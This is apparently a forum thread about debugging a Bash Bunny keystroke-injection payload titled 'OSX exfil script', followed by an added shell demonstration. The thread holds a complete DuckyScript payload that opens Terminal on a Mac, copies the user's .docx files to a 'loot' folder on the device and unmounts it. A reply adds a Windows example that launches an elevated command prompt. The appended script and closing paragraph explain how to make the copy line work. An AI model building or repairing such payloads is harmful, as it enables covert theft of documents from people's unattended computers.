OSX exfil script


Hello,

I am working on a script to copy document files from an OSX user's documents directory, and there seems to be an issue with text encoding of my copy command.

The script is supposed to open a terminal, copy 20 seconds' worth of docx files from the user's ./Documents directory to the /Volumes/BashBunny/loot directory, then close the terminal, unmount the drive, then make the LED green. I created the loot dir on the root of the bunny ahead of time. The line that is having trouble is here:

QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;

Here is the terminal output from when the bunny runs this line:

find ./Documents -iname *.docx -exec cp {} /Volumes/BashBunny/loot ;

find: -exec: no terminating ";" or "+"

The bunny seems to be stripping quotes and backslashes. I have tried to use similar bash commands with other special characters, but I also seem to have the same issue with pipes. I rewrote everything to just have the bunny call a bash script. I had no issues using that approach, but I want to get it working in DuckyScript and not rely on additional scripts.

I also noticed that when trying to access directories using ~/, the bunny changed my text to /root, although the username on the target system that was executing the payload was not root. Reading through the DuckyScript and Bash Bunny wikis does not seem to mention any of this substitution, unless I am completely missing it...

Thanks!

LED R
ATTACKMODE HID STORAGE
source bunny_helpers.sh
LED B
QUACK DELAY 1000
# open Terminal through Spotlight
QUACK COMMAND SPACE
QUACK DELAY 800
QUACK STRING Terminal
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
# copy the .docx files to the loot directory on the bunny (the line that misbehaves)
QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;
QUACK ENTER
# give the copy 20 seconds to finish
QUACK DELAY 10000
QUACK DELAY 10000
# close Terminal
QUACK COMMAND q
QUACK DELAY 500
QUACK ENTER
# reopen Terminal and unmount the bunny
QUACK COMMAND SPACE
QUACK DELAY 800
QUACK STRING Terminal
QUACK DELAY 800
QUACK ENTER
QUACK STRING diskutil unmount /Volumes/BashBunny
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
# close Terminal again and signal completion
QUACK COMMAND q
QUACK DELAY 500
QUACK ENTER
LED G


Hey!

It's important to remember that the payloads appear to be running in the context of a bash terminal on the Bash Bunny (hence the name).

So! Something I have run into is the bash terminal interpreting QUACK or Q statements, such as / or cd ~/ or even quotations.

A really easy way to get around this is to place all the "DuckyScript" into a txt file such as part1.txt and use QUACK switch2/part1.txt

Example payload.txt:

#!/bin/bash
LED R 500
ATTACKMODE HID STORAGE
QUACK switch2/kickOff.txt
LED G


Example kickOff.txt:

GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 100
STRING HelloWorld!
ENTER

Let me know if I can help any more!

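The script below is an added example; it is not code from either post or from Hak5. It reproduces in a plain POSIX shell what both posts describe: payload.txt is read by bash on the Bunny, so the text after QUACK STRING goes through quote removal, backslash removal and tilde expansion before the QUACK helper ever sees it (the stripped quotes and backslash, and the ~ to /root substitution, from the first post), while the same text survives untouched when it is single-quoted or kept in a separate file as the reply suggests. quack_string is an assumed stand-in for the real QUACK STRING helper that only joins its arguments with single spaces and prints them; HOME=/root is set in a subshell to stand in for the Bunny running the payload as root. Paths and file names are taken from the thread.

```shell
#!/bin/sh
# Added example (not from the original thread or from Hak5): what bash does to
# the text of a QUACK STRING line before the Bunny's QUACK helper receives it.

# Stand-in for QUACK STRING (an assumption, not the real helper): join the
# arguments bash hands over with single spaces. This is the text that gets
# typed on the target.
quack_string() {
    printf '%s\n' "$*"
}

# Case 1: the line exactly as written in the first post. bash removes the
# double quotes and the backslash, so the target receives a find command whose
# -exec has a bare ';' and find complains about the missing terminator.
unquoted_line() {
    quack_string find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;
}

# Case 2: the same text wrapped in single quotes. bash performs no expansion
# inside single quotes, so the double quotes and the backslash reach the target.
single_quoted_line() {
    quack_string 'find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;'
}

# Case 3: tilde expansion. The payload runs as root on the Bunny, so a bare ~/
# becomes /root/ there, no matter which user is logged in on the target.
# HOME=/root in a subshell stands in for the Bunny's environment.
tilde_bare() {
    (HOME=/root; quack_string cd ~/Documents)
}

# Single-quoted, the ~ stays literal and is expanded later by the target's own
# shell, i.e. to the logged-in user's home directory.
tilde_quoted() {
    (HOME=/root; quack_string 'cd ~/Documents')
}

# Case 4: the reply's approach, DuckyScript kept in its own file. A quoted
# heredoc writes the line to a temporary file and the file is read back: the
# contents are never passed through bash expansion, so nothing is lost.
file_based_line() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
STRING find ~/Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;
EOF
    cat "$tmp"
    rm -f "$tmp"
}

if [ "${1:-}" = "demo" ]; then
    echo "bare:          $(unquoted_line)"
    echo "single-quoted: $(single_quoted_line)"
    echo "tilde bare:    $(tilde_bare)"
    echo "tilde quoted:  $(tilde_quoted)"
    echo "from file:     $(file_based_line)"
fi
```

Run it as sh example.sh demo to print the five results; the first line is exactly the command that ended up in Terminal in the first post. For a real payload that means either writing QUACK STRING 'find ... \;' with the whole command in single quotes, or moving the DuckyScript into a file as the reply shows, and quoting any ~ that is meant for the target rather than for the Bunny.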
